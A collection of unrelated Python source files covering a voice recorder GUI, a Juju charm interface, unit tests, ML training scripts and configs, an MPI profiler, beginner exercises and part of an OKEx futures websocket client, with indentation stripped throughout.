from time import time , sleep , strftime , gmtime;
import wave;
import pyaudio;
import audioop;
import numpy as np;
class MainWin(Tk) :
def __init__(self,title) :
Tk.__init__(self);
self.title(title);
self.resizable(False,False);
self.geometry("500x50")
self.columnconfigure(1,weight=1);
self.rowconfigure(0,weight=1);
self._part();
self.count= 0;
self.size = 0;
self.stop = False;
self.play = False;
self.starter = True;
def _part(self) :
self.dataSize = Label(self,text="0B".center(10," "))
self.dataSize.grid(row=0,column=0,padx=10,sticky="ew");
self.progressBar = Progressbar(self,mode="determinate")
self.progressBar["maximum"] = 100;
self.progressBar.grid(row=0,column=1,ipady=3,sticky="ew");
self.clockLabel = Label(self,text="00:00:00");
self.clockLabel.grid(row=0,column=2,padx=10,sticky="ew");
self.actionBtn = Button(self,text="jesus",relief="flat",command=self._onAction);
self.actionBtn.grid(row=0,column=3,padx=5);
self.stopBtn = Button(self,text="jesus",relief="flat",state="disabled",command=self._onStop);
self.stopBtn.grid(row=0,column=4,padx=5);
try : image = PhotoImage(file="img/play.png")
except : pass;
else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
try : image = PhotoImage(file="img/stop.png")
except : pass;
else : self.stopBtn.configure(image=image);self.stopBtn.img = image;
self.bind("<space>" , lambda x : self._onAction());
def voice(self) :
def callback(inData,frameCount,timeInfo,statues) :
if self.stop :
file = open(self.nameTemp,"rb")
binaries = b''.join(file.readlines())
pathName = self.saveFile();
if pathName != None :
waveFile = wave.open(pathName, 'wb')
waveFile.setnchannels(2)
waveFile.setsampwidth(audio.get_sample_size(pyaudio.paInt16))
waveFile.setframerate(44100)
waveFile.writeframes(binaries)
waveFile.close()
file.close();
self.fileTemp.close();
remove(self.nameTemp);
self.reset()
return (inData,pyaudio.paComplete);
else :
vis = np.fromstring(inData,dtype=np.int16);
peak = np.average(np.abs(vis))*2;
self._updateProgressBar(int(int(peak)*100/2**16));
if self.play :
#print(inData)
self.fileTemp.write(inData);
self.size += getsizeof(inData);
self.dataSize.configure(text=self.formateSize(self.size))
return (inData,pyaudio.paContinue);
else : return (inData,pyaudio.paContinue);
audio = pyaudio.PyAudio();
stream = audio.open(
format=pyaudio.paInt16,
channels=2,
rate=44100,
input=True,
frames_per_buffer=1024,
stream_callback=callback
);
def _changeFlags(self) :
if self.play : file = "img/play.png";self.play=False;
else : file = "img/pause.png";self.play=True;
try :
image = PhotoImage(file=file);
except : pass
else : self.actionBtn.configure(image=image);self.actionBtn.img=image
def _onStop(self) : self.stop = True;
def _updateProgressBar(self,value) : self.progressBar["value"] = value;
def _onAction(self) :
self._changeFlags();
if self.starter :
self.starter = False;
self.handlerTemp , self.nameTemp = mkstemp();
self.fileTemp = fdopen(self.handlerTemp , "wb");
self._updateTime();
self.voice();
self.stopBtn.configure(state="normal")
@staticmethod
def _startNewThread(func) :
thread = Thread(target=func,args=());
thread.setDaemon(True)
thread.start();
@staticmethod
def saveFile() :
f = asksaveasfile(mode='wb', defaultextension=".wav")
if f is None : return
f.close()
return f.name
@staticmethod
def formateSize(num, suffix='B') :
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi'] :
if abs(num) < 1024.0 :
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0;
return ("%.1f%s%s" % (num, 'Yi', suffix));
def reset(self) :
try : image = PhotoImage(file="img/play.png")
except : pass;
else : self.actionBtn.configure(image=image);self.actionBtn.img = image;
try : image = PhotoImage(file="img/stop.png")
except : pass;
else : self.stopBtn.configure(image=image,state="disabled");self.stopBtn.img = image;
self.size = 0;
self.count = 0;
self.starter = True;
self.play = False;
self.stop = False;
self.progressBar["value"] = 0;
self.dataSize.configure(text="0B".center(10," "))
self.clockLabel.configure(text="00:00:00");
def _updateTime(self) :
if self.stop : return;
if self.play : self.count += 0.2;self.clockLabel.configure(text=str(strftime("%H:%M:%S", gmtime(self.count))));self.after(200,self._updateTime);
else : self.after(200,self._updateTime);
def run(self) :
self.mainloop();
MainWin("jesus christ").run(); |
"""Utilities for genshin.py."""
from . import geetest
from .concurrency import *
from .ds import *
from .fs import *
from .logfile import *
from .uid import *
|
# Copyright 2016 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import charms.reactive as reactive
class ManilaPluginProvides(reactive.RelationBase):
"""This is the subordinate end of the relation. i.e. the configuration
provider to the manila plugin.
The purpose of the provides side of the interface is to provide the manila
charm with configuration information to correctly link to whatever the
plugin wants to do. e.g. for a backend, to configure manila to use the
appropriate backend.
The manila charm provides the service user manila, and other authentication
information that it can use to configure other services in the OpenStack
system.
"""
scope = reactive.scopes.GLOBAL
# These remote data fields will be automatically mapped to accessors
# with a basic documentation string provided.
auto_accessors = ['_authentication_data']
class states():
connected = '{relation_name}.connected'
available = '{relation_name}.available'
changed = '{relation_name}.changed'
@reactive.hook('{provides:manila-plugin}-relation-joined')
def joined(self):
conversation = self.conversation()
conversation.set_state(self.states.connected)
self.update_status()
@reactive.hook('{provides:manila-plugin}-relation-changed')
def changed(self):
"""This hook is used to indicate that something has changed on the
interface and that interested parties should recheck the properties
exposed to see if they need to do anything.
The handler should clear the state after it has been consumed so that
the next change gets registered too.
"""
self.update_status()
@reactive.hook('{provides:manila-plugin}-relation-{broken,departed}')
def departed(self):
conversation = self.conversation()
conversation.remove_state(self.states.connected)
conversation.remove_state(self.states.available)
conversation.remove_state(self.states.changed)
def update_status(self):
"""Set the .available and .changed state if both the plugin name and
the authentication data are available.
Note that the .changed state can be used if the plugin changes the
data. Thus, a subordinate charm (e.g. generic backend) can watched
changed and then clear it using the method clear_changed() to update
configuration files as needed.
The interface will NOT set .changed without having .available at the
same time. Also, the interface will not set .changed unless the
authentication data has changed.
"""
auth_data = self._authentication_data()
conversation = self.conversation()
if auth_data is not None:
conversation.set_state(self.states.available)
scope = conversation.scope
local_auth_data = self.get_local('_authentication_data',
default=None,
scope=scope)
if (local_auth_data is None or local_auth_data != auth_data):
conversation.set_state(self.states.changed)
conversation.set_local(_authentication_data=auth_data,
scope=scope)
def clear_changed(self):
"""Provide a convenient method to clear the .changed relation"""
try:
self.remove_state(self.states.changed)
except ValueError:
# work around Juju 1.25.x error where it can't find the scope for
# the interface (randomly) - Bug #1663633
pass
@property
def name(self):
"""Returns the name if it has been set"""
scope = self.conversations()[0].scope
return self.get_local('_name', default=None, scope=scope)
@name.setter
def name(self, name):
"""Set the name plugin -- this is for logs, and to distinguish between
multiple plugins.
:param name: a string indicating the name of the plugin (or None)
"""
scope = self.conversations()[0].scope
self.set_local(_name=name, scope=scope)
self.set_remote(_name=name, scope=scope)
@property
def authentication_data(self):
"""Return authentication data provided by the Manila charm, or None if
the data has not yet been set.
The authentication data is set when the Manila charm has received it
over its identity interface; thus this may return None until that data
has become available. This means that the configuration data may be
delayed until this is available.
The authentication data format is:
{
'username': <value>
'password': <value>
'project_domain_id': <value>
'project_name': <value>
'user_domain_id': <value>
'auth_uri': <value>
'auth_url': <value>
'auth_type': <value> # 'password', typically
}
:returns: data object that was passed.
"""
data = self._authentication_data()
if data is None:
return None
return json.loads(data)["data"]
@property
def configuration_data(self):
"""Get the configuration data (if it has been set yet) or None"""
scope = self.conversations()[0].scope
data = self.get_local('_configuration_data', default=None, scope=scope)
if data is None:
return
return json.loads(data)["data"]
@configuration_data.setter
def configuration_data(self, data):
"""
NOTE that the data is wrapped in a dictionary, converted to JSON and
then placed in the juju remote variable. The other 'end' unpacks this
and provides the original data to Manila charm.
If complete is False (or missing) then the configuration data is only
partially complete OR the subordinate charm is not ready yet -- e.g. it
still has to configure something.
The format of the data is:
{
"complete": <boolean>,
'<config file>': ""
}
Note that the string for the <config file> should be suitable for
replacing/adding into the configuration file specified.
Thus data has to be JSONable.
:param data: object that describes the plugin data to be sent.
"""
scope = self.conversations()[0].scope
self.set_local(_configuration_data=json.dumps({"data": data}),
scope=scope)
self.set_remote(_configuration_data=json.dumps({"data": data}),
scope=scope)
|
import random
import speech_recognition as sr
import time
from .transcribe import recognize_speech_from_mic
def test_speech_recognition():
# set the list of words, maxnumber of guesses, and prompt limit
WORDS = ["apple", "banana", "grape", "orange", "mango", "lemon"]
NUM_GUESSES = 3
PROMPT_LIMIT = 5
# create recognizer and mic instances
recognizer = sr.Recognizer()
microphone = sr.Microphone()
# get a random word from the list
word = random.choice(WORDS)
# format the instructions string
instructions = (
"I'm thinking of one of these words:\n"
"{words}\n"
"You have {n} tries to guess which one.\n"
).format(words=', '.join(WORDS), n=NUM_GUESSES)
# show instructions and wait 3 seconds before starting the game
print(instructions)
time.sleep(3)
for i in range(NUM_GUESSES):
# get the guess from the user
# if a transcription is returned, break out of the loop and
# continue
# if no transcription returned and API request failed, break
# loop and continue
# if API request succeeded but no transcription was returned,
# re-prompt the user to say their guess again. Do this up
# to PROMPT_LIMIT times
for j in range(PROMPT_LIMIT):
print('Guess {}. Speak!'.format(i+1))
guess = recognize_speech_from_mic(recognizer, microphone)
if guess["transcription"]:
break
if not guess["success"]:
break
print("I didn't catch that. What did you say?\n")
# if there was an error, stop the game
if guess["error"]:
print("ERROR: {}".format(guess["error"]))
break
# show the user the transcription
print("You said: {}".format(guess["transcription"]))
# determine if guess is correct and if any attempts remain
guess_is_correct = guess["transcription"].lower() == word.lower()
user_has_more_attempts = i < NUM_GUESSES - 1
# determine if the user has won the game
# if not, repeat the loop if user has more attempts
# if no attempts left, the user loses the game
if guess_is_correct:
print("Correct! You win!".format(word))
break
elif user_has_more_attempts:
print("Incorrect. Try again.\n")
else:
print("Sorry, you lose!\nI was thinking of '{}'.".format(word))
break
|
from enum import IntEnum
class DataSetType(IntEnum):
RAW = 0
FILE = 1
ABBYY = 2
PAGEXML = 3
HDF5 = 4
EXTENDED_PREDICTION = 5
GENERATED_LINE = 6
def __str__(self):
return self.name
@staticmethod
def from_string(s):
try:
return DataSetType[s]
except KeyError:
raise ValueError()
@staticmethod
def files(type):
files_meta = {
DataSetType.RAW: False,
DataSetType.FILE: True,
DataSetType.ABBYY: True,
DataSetType.PAGEXML: True,
DataSetType.EXTENDED_PREDICTION: True,
DataSetType.HDF5: False,
DataSetType.GENERATED_LINE: False,
}
return files_meta[type]
@staticmethod
def gt_extension(type):
return {
DataSetType.RAW: None,
DataSetType.FILE: ".gt.txt",
DataSetType.ABBYY: ".abbyy.xml",
DataSetType.PAGEXML: ".xml",
DataSetType.EXTENDED_PREDICTION: ".json",
DataSetType.HDF5: ".h5",
DataSetType.GENERATED_LINE: None,
}[type]
@staticmethod
def pred_extension(type):
return {
DataSetType.RAW: None,
DataSetType.FILE: ".pred.txt",
DataSetType.ABBYY: ".pred.abbyy.xml",
DataSetType.PAGEXML: ".pred.xml",
DataSetType.EXTENDED_PREDICTION: ".json",
DataSetType.HDF5: ".pred.h5",
DataSetType.GENERATED_LINE: None,
}[type]
|
#!/usr/bin/python
import pypresenter.slide
class slide3(pypresenter.slide):
def __init__(self):
super(self.__class__, self).__init__('center')
def content(self, window=None):
return 'pyconfig DSL (Domain Specific Language)'
def draw(self, window):
self.displayText(window, self.content()) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-import unittest
import unittest
import json
from signature import MTSigner
class TestSignature(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testSign(self):
fo = open("../sample.txt", "r")
str = fo.read()
fo.close()
sample = json.loads(str)
signer = MTSigner(sample['key'].encode('utf-8'))
for _map in sample['maps']:
self.assertEqual(_map['sign'], signer.sign(_map['text'].encode('utf-8')))
|
# Copyright 2021 aaaaaaaalesha <sks2311211@mail.ru>
import unittest
from src.stack import Stack
class StackTestCase(unittest.TestCase):
def test_stack_empty(self):
stack = Stack()
self.assertTrue(stack.empty())
stack.push(1)
self.assertFalse(stack.empty())
stack.push(2)
self.assertEqual(stack.__str__(), "Stack[2, 1]")
self.assertFalse(stack.empty())
stack.clear()
self.assertTrue(stack.empty())
def test_stack_pop_top(self):
stack = Stack()
self.assertTrue(stack.empty())
stack.push(1)
self.assertFalse(stack.empty())
self.assertEqual(stack.top(), 1)
stack.push(2)
self.assertEqual(stack.top(), 2)
stack.push(3)
self.assertEqual(stack.top(), 3)
self.assertEqual(stack.__str__(), "Stack[3, 2, 1]")
self.assertEqual(stack.pop(), 3)
self.assertEqual(stack.pop(), 2)
self.assertEqual(stack.pop(), 1)
self.assertTrue(stack.empty())
if __name__ == '__main__':
unittest.main()
|
_base_ = ['../ld/ld_r18_gflv1_r101_fpn_coco_1x.py']
model = dict(
pretrained='torchvision://resnet50',
output_feature=True,
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs='on_output',
num_outs=5),
bbox_head=dict(
type='IMHead',
num_classes=80,
in_channels=256,
stacked_convs=4,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
ratios=[1.0],
octave_base_scale=8,
scales_per_octave=1,
strides=[8, 16, 32, 64, 128]),
loss_cls=dict(
type='QualityFocalLoss',
use_sigmoid=True,
beta=2.0,
loss_weight=1.0),
loss_dfl=dict(type='DistributionFocalLoss', loss_weight=0),
loss_ld=dict(
type='KnowledgeDistillationKLDivLoss', loss_weight=0.25, T=10),
loss_kd=dict(
type='KnowledgeDistillationKLDivLoss', loss_weight=10, T=2),
loss_im=dict(type='IMLoss', loss_weight=2.0),
reg_max=16,
loss_bbox=dict(type='GIoULoss', loss_weight=2.0)),
)
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
)
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
|
from mpi4py import MPI
from time import perf_counter as gettime
import numpy
import sys
from contextlib import contextmanager
class Profiler:
def resettime(self):
self.t0 = gettime()
def setbarrier(self, inoption):
self.timerbarrier = inoption
def setmpicommunicator(self, inmpicommunicator):
self.mpicommobj = inmpicommunicator
self.myrank = self.mpicommobj.Get_rank()
self.numproc = self.mpicommobj.Get_size()
def __init__(self, inmpicommunicator):
self.setmpicommunicator(inmpicommunicator)
self.resettime()
self.opensections = []
self.sectiontimes = []
self.timerbarrier = True
def starttimer(self, sectionname="MAIN"):
if sectionname == "MAIN":
self.resettime()
numopensections = len(self.opensections)
opensection = [numopensections, sectionname, 1, 0, 0]
if self.timerbarrier:
self.mpicommobj.Barrier()
opensection[3] = gettime()
self.opensections.append(opensection)
def endtimer(self, sectionname="MAIN"):
numopensections = len(self.opensections)
if numopensections <= 0:
print(
"Error: EndTimer(",
sectionname,
") called with no matching StartTimer.",
)
1 / 0
sectiontime = gettime()
if self.timerbarrier:
self.mpicommobj.Barrier()
opensectionindex = numopensections - 1
if sectionname != self.opensections[opensectionindex][1]:
print(
"SectionName: Expected(",
self.opensections[opensectionindex][1],
")",
", Got(",
sectionname,
")",
)
1 / 0
opensection = self.opensections.pop()
sectiontime = sectiontime - opensection[3]
opensection[3] = sectiontime
opensectionindex = opensectionindex - 1
# Update parent's sub-timers
if opensectionindex >= 0:
self.opensections[opensectionindex][4] += sectiontime
# Update section if it exists
numsections = len(self.sectiontimes)
match = False
for i in range(numsections):
if self.sectiontimes[i][1] == sectionname:
existingsection = self.sectiontimes[i]
existingsection[2] += 1
existingsection[3] += sectiontime
existingsection[4] += opensection[4]
match = True
break
# Create new section if it didn't exist
if not match:
self.sectiontimes.append(opensection)
@contextmanager
def contexttimer(self, contextname=""):
self.starttimer(contextname)
yield contextname
self.endtimer(contextname)
def writeserialprofile(self, filename=""):
# copy the timers to avoid destructing the list when printing
sectiontimers = list(self.sectiontimes)
numsections = len(sectiontimers)
numcurrentsections = numsections
minlevel = 0
profilefile = sys.stdout
if filename != "":
profilefile = open(filename, "w")
if numcurrentsections > 0:
print(
"# SectionName NumCalls TotalTime ChildTime",
file=profilefile,
)
while numcurrentsections > 0:
match = False
for i in range(numcurrentsections):
if sectiontimers[i][0] == minlevel:
sectiontimer = sectiontimers.pop()
# print out SectionName NumCalls TotalTime ChildTime
print(
sectiontimer[1],
sectiontimer[2],
sectiontimer[3],
sectiontimer[4],
file=profilefile,
)
match = True
break
if match is False:
minlevel += 1
numcurrentsections = len(sectiontimers)
if filename != "":
profilefile.close()
# WriteParallelProfile is a collective call, must be called on all procs
def writeparallelprofile(self, filename=""):
sectiontimers = list(self.sectiontimes)
numsections = len(sectiontimers)
mynumsections = numpy.zeros(1, dtype=int)
mycheck = numpy.zeros(1, dtype=int)
self.mpicommobj.Barrier()
numproc = self.mpicommobj.Get_size()
if self.myrank == 0:
mynumsections[0] = numsections
self.mpicommobj.Bcast(mynumsections, root=0)
if numsections == mynumsections[0]:
mynumsections[0] = 0
else:
mynumsections[0] = 1
print(
"(",
self.myrank,
"): ",
numsections,
" != ",
mynumsections[0],
)
1 / 0
self.mpicommobj.Reduce(mynumsections, mycheck, MPI.MAX, 0)
if mycheck > 0:
print(
"ReduceTimers:Error: Disparate number of sections ",
"across processors.",
)
1 / 0
mysectiontimes = numpy.zeros(numsections, dtype="float")
mintimes = numpy.zeros(numsections, dtype="float")
maxtimes = numpy.zeros(numsections, dtype="float")
sumtimes = numpy.zeros(numsections, dtype="float")
for i in range(numsections):
mysectiontimes[i] = sectiontimers[i][3]
self.mpicommobj.Reduce(mysectiontimes, mintimes, MPI.MIN, 0)
self.mpicommobj.Reduce(mysectiontimes, maxtimes, MPI.MAX, 0)
self.mpicommobj.Reduce(mysectiontimes, sumtimes, MPI.SUM, 0)
if self.myrank == 0:
profilefile = sys.stdout
if filename != "":
profilefile = open(filename, "w")
print("# NumProcs: ", numproc, file=profilefile)
print(
"# SectionName MinTime MaxTime MeanTime",
file=profilefile,
)
for i in range(numsections):
sectiontime = sectiontimers[i]
print(
sectiontime[1],
mintimes[i],
maxtimes[i],
sumtimes[i] / float(self.numproc),
file=profilefile,
)
if filename != "":
profilefile.close()
self.mpicommobj.Barrier()
def makeparallelfilename(self, rootname=""):
myrootname = rootname
if myrootname == "":
myrootname = "Profiler"
numproc = self.mpicommobj.Get_size()
profilefilename = myrootname + "_ParTimes_" + str(numproc)
return profilefilename
|
import torch
import torchvision
import torchvision.transforms as transforms
import math
import time
# How many models (==slaves)
K=10
# train K models by Federated learning
# each iteration over a subset of parameters: 1) average 2) pass back average to slaves 3) SGD step
# initialize with pre-trained models (better to use common initialization)
# loop order: loop 0: parameters/layers {
# loop 1 : { averaging (part of the model)
# loop 2: { epochs/databatches { train; } } } }
# repeat this Nloop times
torch.manual_seed(69)
# minibatch size
default_batch=128 # no. of batches per model is (50000/K)/default_batch
Nloop=12 # how many loops over the whole network
Nepoch=1 # how many epochs?
Nadmm=3 # how many FA iterations
load_model=False
init_model=True
save_model=True
check_results=True
# if input is biased, each 1/K training data will have
# (slightly) different normalization. Otherwise, same normalization
biased_input=True
# (try to) use a GPU for computation?
use_cuda=True
if use_cuda and torch.cuda.is_available():
mydevice=torch.device('cuda')
else:
mydevice=torch.device('cpu')
# split 50000 training data into K subsets (last one will be smaller if K is not a divisor)
K_perslave=math.floor((50000+K-1)/K)
subsets_dict={}
for ck in range(K):
if K_perslave*(ck+1)-1 <= 50000:
subsets_dict[ck]=range(K_perslave*ck,K_perslave*(ck+1)-1)
else:
subsets_dict[ck]=range(K_perslave*ck,50000)
transforms_dict={}
for ck in range(K):
if biased_input:
# slightly different normalization for each subset
transforms_dict[ck]=transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5+ck/100,0.5-ck/100,0.5),(0.5+ck/100,0.5-ck/100,0.5))])
else:
# same normalization for all training data
transforms_dict[ck]=transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5,0.5,0.5),(0.5,0.5,0.5))])
trainset_dict={}
testset_dict={}
trainloader_dict={}
testloader_dict={}
for ck in range(K):
trainset_dict[ck]=torchvision.datasets.CIFAR10(root='./torchdata', train=True,
download=True, transform=transforms_dict[ck])
testset_dict[ck]=torchvision.datasets.CIFAR10(root='./torchdata', train=False,
download=True, transform=transforms_dict[ck])
trainloader_dict[ck] = torch.utils.data.DataLoader(trainset_dict[ck], batch_size=default_batch, shuffle=False, sampler=torch.utils.data.SubsetRandomSampler(subsets_dict[ck]),num_workers=1)
testloader_dict[ck]=torch.utils.data.DataLoader(testset_dict[ck], batch_size=default_batch,
shuffle=False, num_workers=0)
import numpy as np
# define variational autoencoder
from simple_models import *
net_dict={}
for ck in range(K):
net_dict[ck]=AutoEncoderCNN().to(mydevice)
# update from saved models
if load_model:
checkpoint=torch.load('./s'+str(ck)+'.model',map_location=mydevice)
net_dict[ck].load_state_dict(checkpoint['model_state_dict'])
net_dict[ck].train()
########################################################################### helper functions
from simple_utils import *
reconstruction_function = nn.MSELoss(reduction='sum')
def loss_function(recon_x, x, mu, logvar):
"""
recon_x: generated image
x : original image
mu : latent z mean
logvar: latent z log variance : log(sigma^2)
"""
MSE=reconstruction_function(recon_x,x)
# loss = 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
KLD=-0.5*torch.sum(1+logvar-mu.pow(2)-logvar.exp())
#print('%f %f'%(MSE,KLD))
return MSE+KLD
##############################################################################################
if init_model:
for ck in range(K):
# note: use same seed for random number generation
torch.manual_seed(0)
net_dict[ck].apply(init_weights)
# get layer ids in given order 0..L-1 for selective training
np.random.seed(0)# get same list
Li=net_dict[0].train_order_block_ids()
L=len(Li)
import torch.optim as optim
############### loop 00 (over the full net)
for nloop in range(Nloop):
############ loop 0 (over layers of the network)
for ci in range(L):
for ck in range(K):
unfreeze_one_layer(net_dict[ck],ci)
trainable=filter(lambda p: p.requires_grad, net_dict[0].parameters())
params_vec1=torch.cat([x.view(-1) for x in list(trainable)])
# number of parameters trained
N=params_vec1.numel()
z=torch.empty(N,dtype=torch.float,requires_grad=False).to(mydevice)
z.fill_(0.0)
opt_dict={}
for ck in range(K):
opt_dict[ck]=optim.Adam(filter(lambda p: p.requires_grad, net_dict[ck].parameters()),lr=0.001)
############# loop 1 (Federated avaraging for subset of model)
for nadmm in range(Nadmm):
##### loop 2 (data) (all network updates are done per epoch, because K is large
##### and data per host is assumed to be small)
for epoch in range(Nepoch):
#### loop 3 (models)
for ck in range(K):
running_loss=0.0
for i,(images, _) in enumerate(trainloader_dict[ck],0): # ignore labels
# get the inputs
x=Variable(images).to(mydevice)
def closure1():
out, mu, logvar = net_dict[ck](x)
if torch.is_grad_enabled():
opt_dict[ck].zero_grad()
loss=loss_function(out,x,mu,logvar)
if loss.requires_grad:
loss.backward()
return loss
# ADMM step 1
opt_dict[ck].step(closure1)
# only for diagnostics
out, mu, logvar= net_dict[ck](x)
loss1=loss_function(out,x,mu,logvar).data.item()
running_loss +=float(loss1)
print('model=%d block=[%d,%d] %d(%d) minibatch=%d epoch=%d loss %e'%(ck,Li[ci][0],Li[ci][1],nloop,N,i,epoch,loss1))
del x,loss1,out,mu,logvar
# Federated averaging
x_dict={}
for ck in range(K):
x_dict[ck]=get_trainable_values(net_dict[ck],mydevice)
znew=torch.zeros(x_dict[0].shape).to(mydevice)
for ck in range(K):
znew=znew+x_dict[ck]
znew=znew/K
dual_residual=torch.norm(z-znew).item()/N # per parameter
print('dual (epoch=%d,loop=%d,block=[%d,%d],avg=%d)=%e'%(epoch,nloop,Li[ci][0],Li[ci][1],nadmm,dual_residual))
z=znew
for ck in range(K):
put_trainable_values(net_dict[ck],z)
print('Finished Training')
if save_model:
for ck in range(K):
torch.save({
'model_state_dict':net_dict[ck].state_dict(),
'epoch':epoch,
'optimizer_state_dict':opt_dict[ck].state_dict(),
'running_loss':running_loss,
},'./s'+str(ck)+'.model')
|
import os
import sys
import yaml
repos = {}
config = {
"token": os.environ["GITHUB_TOKEN"],
"repos": repos,
}
repos["nightly.link"] = {
"queries": [("https://nightly.link", "-path:.github/workflows")],
"min_stars": 8,
}
repos["nightly.link in workflows"] = {
"queries": [("https://nightly.link", "path:.github/workflows")],
"min_stars": 5,
}
for name, min_stars in [
("install-crystal", 4),
("find-latest-tag", 13),
]:
queries = [
(f"oprypin/{name}", "path:.github/workflows language:yaml"),
]
repos[name] = {"queries": queries, "min_stars": min_stars}
for name, plugname, *query, min_stars in [
("mkdocstrings-crystal", "mkdocstrings", "default_handler", "crystal", 0),
("mkdocs-section-index", "section-index", 2),
("mkdocs-literate-nav", "literate-nav", 0),
("mkdocs-gen-files", "gen-files", 0),
("mkdocs-same-dir", "same-dir", 0),
("mkdocstrings", "mkdocstrings", "-crystal", 10),
("mkdocs-autorefs", "autorefs", 3),
]:
query = query or [""]
query[-1] += " filename:mkdocs.yml"
queries = [
("plugins", "- " + plugname, *query),
(name, "filename:requirements.txt"),
]
if name in ["mkdocstrings", "mkdocs-autorefs"]:
del queries[-1]
repos[name] = {"queries": queries, "min_stars": min_stars}
for name, require, min_stars in [
("crsfml", "crsfml", 1),
("crystal-chipmunk", "chipmunk", 1),
("crystal-imgui", None, 0),
]:
queries = [(f"oprypin/{name}", "filename:shard.yml")]
if require:
queries += [(f'require "{require}"', "language:crystal")]
repos[name] = {"queries": queries, "min_stars": min_stars}
for name, imprt, min_stars in [
("pytest-golden", "pytest_golden", 0),
]:
queries = [
(imprt, "language:python"),
(name, "filename:requirements.txt"),
]
repos[name] = {"queries": queries, "min_stars": min_stars}
yaml.safe_dump(config, sys.stdout, sort_keys=False)
|
# -*- coding: utf-8 -*-
# Store a person’s name in a variable, and print a message
# to that person. Your message should be simple, such as, “Hello Eric, would you like to learn some Python today?”
name = 'Ross'
print('Hello ' + name + ', would you like to learn some Python today?') |
"""
Enunciado
Faça um programa que peça para o usuário digitar um número n e imprima uma lista com todos os números de 0 a n-1.
Exemplo: se o usuário digitar 5, o programa deve imprimir [0, 1, 2, 3, 4]
"""
lista = []
numero = int(input("Digite um número inteiro: "))
c = 0
while c < numero:
lista.append(c)
c = c + 1
print(lista) |
import sys
sys.path.append('../')
sys.path.append('../../')
from dquant.util import Util
import os
import asyncio, collections
import json, time
import logging
import hashlib
import queue
from asyncio import AbstractEventLoop
from dquant.config import cfg
from dquant.constants import Constants
from dquant.markets.market import Market
from dquant.strategy.trigger import DepthIndexTrigger
logger = logging.getLogger(__name__)
class OkexFutureWs( Market):
def __init__(self, meta_code,loop):
self.contract_type = None
self.symbol = None
market_currency, base_currency, symbol, contract_type = self.parse_meta(meta_code)
super().__init__(market_currency, base_currency, meta_code, cfg.get_float_config(Constants.OKEX_FUTURE_FEE))
self.apikey = cfg.get_config(Constants.OKEX_FUTURE_APIKEY)
self.apisec = cfg.get_config(Constants.OKEX_FUTURE_APISEC)
self.base_url = Constants.OKEX_FUTURE_WS_BASE
self.okex_id = cfg.get_config(Constants.OKEX_FUTURE_ID)
self.strategy_id = cfg.get_config(Constants.OKEX_FUTURE_STRATEGY_ID)
self.fee_rate_taker = cfg.get_float_config(Constants.OKEX_FUTURE_FEE_TAKER)
self.contract_type = contract_type
self.symbol = symbol
self.timeout = Constants.OK_HTTP_TIMEOUT
self.name = "OKEXFuture"
self.strategy_id = 0
self.q = asyncio.Queue()
self.q_order_result = queue.Queue()
# self.q_trigger = queue.Queue()
self.position = {}
self.websocket = None
self.depth = None
self.ticker = None
self.trades = None
self.index_price = None
self.trade = None
self.hist_lenth = 10
self.order_type = {1: 'long', 2: 'short', 3: 'close_long', 4: 'close_short'}
self.unique_active_orders = {}
# self.order_result_required = False
# self.q_order_result = queue.Queue()
self.depth_channel = "ok_sub_future_{}_depth_{}_usd_20".format(self.market_currency, self.contract_type)
self.ticker_channel = 'ok_sub_futureusd_{}_ticker_{}'.format(self.market_currency, self.contract_type)
self.trades_channel = 'ok_sub_futureusd_{}_trade_{}'.format(self.market_currency, self.contract_type)
self.index_price_channel = 'ok_sub_futureusd_{}_index'.format(self.market_currency)
self.hist={'delete': collections.OrderedDict()}
for _type_num, _type in self.order_type.items():
self.hist[_type] = collections.OrderedDict()
# self.lock = threading.Lock()
self.update_flags = {"depth": False}
self.loop = loop # type: AbstractEventLoop
self.static_methods_register()
# 订阅频道
async def sub_channel(self):
# X值为:btc, ltc
# sub depth
# channel = "ok_sub_future_btc_depth_this_week_usd"
message = [str({'event': 'addChannel', 'channel': self.depth_channel}),
self.build_message(channel=Constants.OKEX_FUTURE_LOGIN, event='login'),
str({'event': 'addChannel', 'channel': self.ticker_channel}),
str({'event': 'addChannel', 'channel': self.trades_channel}),
str({'event':'addChannel','channel': self.index_price_channel})
]
for m in message:
await self.websocket.send(m)
# 格式化ws传回数据
def okex_depth_format(self, res, flag):
result_list = []
for ticker in res[flag]: result_list.append({
'price': float(ticker[0]),
'amount': float(ticker[1])
})
if flag == "asks": # 卖单从小到大
result_list.sort(key=lambda x: x['price'])
else: # 买单从大到小
result_list.sort(key=lambda x: x['price'], reverse=True)
return result_list
def static_methods_register(self):
self.methods[self.depth_channel] = self.update_depth
self.methods[Constants.OKEX_FUTURE_LOGIN] = self.login
# 接收订单更新信息
self.methods[Constants.OKEX_FUTURE_SUB_TRADES] = self.sub_trades
self.methods[Constants.OKEX_FUTURE_SUB_POSITIONS] = self.sub_position
self.methods[self.index_price_channel] = self.update_index_price
def register_callbacks(self):
self.methods[self.depth_channel] = self.update_depth
self.methods[self.ticker_channel] = self.update_ticker
self.methods[self.trades_channel] = self.update_trades
self.methods[self.index_price_channel] = self.update_index_price
self.methods[Constants.OKEX_FUTURE_LOGIN] = self.login
